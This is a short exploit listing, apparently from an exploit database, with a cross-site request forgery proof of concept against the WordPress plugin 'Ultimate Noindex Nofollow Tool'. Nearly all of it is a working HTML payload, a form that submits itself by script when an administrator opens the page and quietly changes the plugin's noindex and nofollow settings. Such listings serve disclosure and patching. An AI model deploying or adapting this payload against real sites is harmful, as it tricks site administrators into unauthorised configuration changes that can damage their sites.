Share
## https://sploitus.com/exploit?id=WPEX-ID:15EA1FFD-5A0C-422C-8C9C-7B632516A156
Have an admin open an HTML file containing the following:
```
<form action="https://example.com/wp-admin/options-general.php?page=ultimate-noindex-nofollow-tool/ultimate-noindex.php" method="POST">
<input type="text" name="unn_hidden" value="Y">
<input type="text" name="unn_noindex_pages" value="1,2,3,4">
<input type="text" name="unn_nofollow_pages" value="">
<input type="text" name="Submit" value="Update Options">
</form>
<script>
document.forms[0].submit();
</script>
```